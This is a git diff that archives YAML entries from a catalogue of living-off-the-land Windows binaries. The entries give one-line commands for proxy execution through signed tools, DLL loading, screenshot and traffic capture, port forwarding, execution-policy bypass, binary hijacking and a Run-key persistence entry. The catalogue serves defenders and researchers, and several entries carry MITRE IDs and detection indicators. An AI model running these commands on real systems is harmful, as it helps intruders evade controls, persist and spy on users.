Archiving off legacy LOLUtilz

Archive-Old-Version/LOLUtilz/OSBinaries/Explorer.yml

@@ -0,0 +1,19 @@
+---
+Name: Explorer.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: explorer.exe calc.exe
+    Description: 'Executes calc.exe as a subprocess of explorer.exe.'
+Full_Path:
+  - c:\windows\explorer.exe
+  - c:\windows\sysWOW64\explorer.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/bohops/status/986984122563391488
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'

Archive-Old-Version/LOLUtilz/OSBinaries/Netsh.yml

@@ -0,0 +1,27 @@
+---
+Name: Netsh.exe
+Description: Execute, Surveillance
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: |
+          netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
+          netsh.exe trace show status
+    Description: Capture network traffic on remote file share.
+  - Command: netsh.exe add helper C:\Path\file.dll
+    Description: Load (execute) NetSh.exe helper DLL file.
+  - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
+    Description: Forward traffic from the listening address and proxy to a remote system.
+Full_Path:
+  - C:\Windows\System32
+  - C:\Windows\SysWOW64
+Code_Sample: []
+Detection: []
+Resources:
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
+  - https://attack.mitre.org/wiki/Technique/T1128
+  - https://twitter.com/teemuluotio/status/990532938952527873
+Acknowledgement:
+  - Person: ''
+  - Handle: ''

Archive-Old-Version/LOLUtilz/OSBinaries/Nltest.yml

@@ -0,0 +1,18 @@
+---
+Name: Nltest.exe
+Description: Credentials
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
+    Description: ''
+Full_Path:
+  - c:\windows\system32\nltest.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/sysopfb/status/986799053668139009
+  - https://ss64.com/nt/nltest.html
+Acknowledgement:
+  - Person: Sysopfb
+    Handle: '@sysopfb'

Archive-Old-Version/LOLUtilz/OSBinaries/Openwith.yml

@@ -0,0 +1,20 @@
+---
+Name: Openwith.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Commands:
+  - Command: OpenWith.exe /c C:\test.hta
+    Description: Opens the target file with the default application.
+  - Command: OpenWith.exe /c C:\testing.msi
+    Description: Opens the target file with the default application.
+Full_Path:
+  - c:\windows\system32\Openwith.exe
+  - c:\windows\sysWOW64\Openwith.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/harr0ey/status/991670870384021504
+Acknowledgement:
+  - Person: Matt harr0ey
+    Handle: '@harr0ey'

Archive-Old-Version/LOLUtilz/OSBinaries/Powershell.yml

@@ -0,0 +1,18 @@
+---
+Name: Powershell.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Commands:
+  - Command: powershell -ep bypass - < c:\temp:ttt
+    Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
+Full_Path:
+  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
+  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Moriarty_Meng/status/984380793383370752
+Acknowledgement:
+  - Person: Moriarty
+    Handle: '@Moriarty_Meng'

Archive-Old-Version/LOLUtilz/OSBinaries/Psr.yml

@@ -0,0 +1,23 @@
+---
+Name: Psr.exe
+Description: Surveillance
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
+    Description: Capture screenshots of the desktop and save them in the target .ZIP file.
+  - Command: psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip
+    Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
+  - Command: psr.exe /stop
+    Description: Stop the Problem Step Recorder.
+Full_Path:
+  - C:\Windows\System32\Psr.exe
+  - C:\Windows\SysWOW64\Psr.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
+Acknowledgement:
+  - Person: ''
+  - Handle: ''

Archive-Old-Version/LOLUtilz/OSBinaries/Robocopy.yml

@@ -0,0 +1,21 @@
+---
+Name: Robocopy.exe
+Description: Copy
+Author: ''
+Created: 2018-05-25
+Categories: []
+Commands:
+  - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
+    Description: Copy the entire contents of the SourceFolder to the DestFolder.
+  - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
+    Description: Copy the entire contents of the SourceFolder to the DestFolder.
+Full_Path:
+  - c:\windows\system32\binary.exe
+  - c:\windows\sysWOW64\binary.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
+Acknowledgement:
+  - Person: ''
+  - Handle: ''

Archive-Old-Version/LOLUtilz/OtherBinaries/AcroRd32.yml

@@ -0,0 +1,17 @@
+---
+Name: AcroRd32.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
+    Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
+Full_Path:
+  - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/997997818362155008
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

Archive-Old-Version/LOLUtilz/OtherBinaries/Gpup.yml

@@ -0,0 +1,17 @@
+---
+Name: Gpup.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
+    Description: Execute another command through gpup.exe (Notepad++ binary).
+Full_Path:
+  - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe    '
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/997892519827558400
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

Archive-Old-Version/LOLUtilz/OtherBinaries/Nlnotes.yml

@@ -0,0 +1,18 @@
+---
+Name: Nlnotes.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
+    Description: Run PowerShell via LotusNotes.
+Full_Path:
+  - C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
+  - https://twitter.com/HanseSecure/status/995578436059127808
+Acknowledgement:
+  - Person: Daniel Bohannon
+    Handle: '@danielhbohannon'

Archive-Old-Version/LOLUtilz/OtherBinaries/Notes.yml

@@ -0,0 +1,18 @@
+---
+Name: Notes.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
+    Description: Run PowerShell via LotusNotes.
+Full_Path:
+  - C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
+  - https://twitter.com/HanseSecure/status/995578436059127808
+Acknowledgement:
+  - Person: Daniel Bohannon
+    Handle: '@danielhbohannon'

Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml

@@ -0,0 +1,28 @@
+---
+Name: Nvudisp.exe
+Description: Execute, Copy, Add registry, Create shortcut, kill process
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Nvudisp.exe System calc.exe
+    Description: Execute calc.exe as a subprocess.
+  - Command: Nvudisp.exe Copy test.txt,test-2.txt
+    Description: Copy fila A to file B.
+  - Command: Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
+    Description: Add/Edit a Registry key value.
+  - Command: Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
+    Description: Create shortcut file.
+  - Command: Nvudisp.exe KillApp calculator.exe
+    Description: Kill a process.
+  - Command: Nvudisp.exe Run foo
+    Description: Run process
+Full_Path:
+  - C:\windows\system32\nvuDisp.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+---

Archive-Old-Version/LOLUtilz/OtherBinaries/Nvuhda6.yml

@@ -0,0 +1,27 @@
+---
+Name: Nvuhda6.exe
+Description: Execute, Copy, Add registry, Create shortcut, kill process
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: nvuhda6.exe System calc.exe
+    Description: Execute calc.exe as a subprocess.
+  - Command: nvuhda6.exe Copy test.txt,test-2.txt
+    Description: Copy fila A to file B.
+  - Command: nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
+    Description: Add/Edit a Registry key value
+  - Command: nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
+    Description: Create shortcut file.
+  - Command: nvuhda6.exe KillApp calc.exe
+    Description: Kill a process.
+  - Command: nvuhda6.exe Run foo
+    Description: Run process
+Full_Path:
+  - Missing
+Code_Sample: []
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
+Acknowledgement:
+  - Person: Adam
+    Handle: '@hexacorn'

Archive-Old-Version/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml

@@ -0,0 +1,17 @@
+---
+Name: ROCCAT_Swarm.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
+    Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
+Full_Path:
+  - C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/994213164484001793
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml

@@ -0,0 +1,27 @@
+---
+Name: RunCmd_X64.exe
+Description: A tool to execute a command file
+Author: Bart
+Created: 2019-03-17
+Commands:
+  - Command: RunCmd_X64 file.cmd /F
+    Description: Launch command file and hide the console window
+    Usecase: Run applications and scripts using Acer's RunCmd
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+- Path: C:\OEM\Preload\utility
+Code_Sample: 
+- Code: 
+Detection: 
+- IOC: RunCmd_X64.exe spawned
+Resources:
+ - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
+ - Link: https://twitter.com/bartblaze/status/1107390776147881984
+Acknowledgement:
+  - Person: Bart
+    Handle: '@bartblaze'
+---

Archive-Old-Version/LOLUtilz/OtherBinaries/Setup.yml

@@ -0,0 +1,17 @@
+---
+Name: Setup.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Run Setup.exe
+    Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
+Full_Path:
+  - C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/994381620588236800
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml

@@ -0,0 +1,19 @@
+---
+Name: Update.exe
+Description: Binary to update the existing installed Nuget/squirrel package. Part of Whatsapp installation.
+Author: 'Jesus Galvez'
+Created: '2020-11-01'
+Commands:
+  - Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
+    Description: Copy your payload into "%localappdata%\Whatsapp\app-[version]\". Then run the command. Update.exe will execute the file you copied.
+    Usecase: Execute binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
+    OperatingSystem: Windows 7 and up with Whatsapp installed
+Full_Path:
+  - Path: '%localappdata%\Whatsapp\Update.exe'
+Detection: 
+  - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
+---

Archive-Old-Version/LOLUtilz/OtherBinaries/Usbinst.yml

@@ -0,0 +1,17 @@
+---
+Name: Usbinst.exe
+Description: Execute
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
+    Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
+Full_Path:
+  - C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/993514357807108096
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

Archive-Old-Version/LOLUtilz/OtherBinaries/VBoxDrvInst.yml

@@ -0,0 +1,17 @@
+---
+Name: VBoxDrvInst.exe
+Description: Persistence
+Author: ''
+Created: 2018-05-25
+Commands:
+  - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
+    Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
+Full_Path:
+  - C:\Program Files\Oracle\VirtualBox Guest Additions
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/993497996179492864
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'

Archive-Old-Version/LOLUtilz/OtherBinaries/aswrundll.yml

@@ -0,0 +1,20 @@
+Name: aswrundll.exe
+Description: This process is used by AVAST antivirus to run and execute any modules
+Author: Eli Salem
+Created: '2019-03-19'
+Commands:
+  - Command: '"C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll"'
+    Description: Load and execute modules using aswrundll
+    Usecase: Execute malicious modules using aswrundll.exe
+    Category: Execute
+    Privileges: Any
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+Full_Path:
+- Path: 'C:\Program Files\Avast Software\Avast\aswrundll'
+Code_Sample: 
+- Code: '["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]'
+Resources:
+ - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
+Acknowledgement:
+  - Person: Eli Salem 
+    handle: 'https://www.linkedin.com/in/eli-salem-954728150'

Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml

@@ -0,0 +1,29 @@
+---
+Name: winword.exe
+Description: Document editor included with Microsoft Office.
+Author: 'Oddvar Moe'
+Created: 2018-05-25
+Commands:
+  - Command: winword.exe /l dllfile.dll
+    Description: Launch DLL payload.
+    Usecase: Execute a locally stored DLL using winword.exe.
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
+    OperatingSystem: Windows
+Full_Path:
+  - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
+Code_Sample:
+  - Code:
+Detection:
+  - IOC:
+Resources:
+  - Link: https://twitter.com/vysecurity/status/884755482707210241
+  - Link: https://twitter.com/Hexacorn/status/885258886428725250
+Acknowledgement:
+  - Person: Vincent Yiu (cmd)
+    Handle: '@@vysecurity'
+  - Person: Adam (Internals)
+    Handle: '@Hexacorn'
+---

Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml

@@ -0,0 +1,30 @@
+---
+Name: testxlst.js
+Description: Script included with Pywin32.
+Author: 'Oddvar Moe'
+Created: 2018-05-25
+Commands:
+  - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
+    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
+    Category: Execution
+    Privileges: User
+    MitreID: T1064
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
+    OperatingSystem: Windows
+  - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
+    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
+    Category: Execution
+    Privileges: User
+    MitreID: T1064
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
+    OperatingSystem: Windows
+Full_Path:
+  - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
+Code_Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/bohops/status/993314069116485632
+  - https://github.com/mhammond/pywin32
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'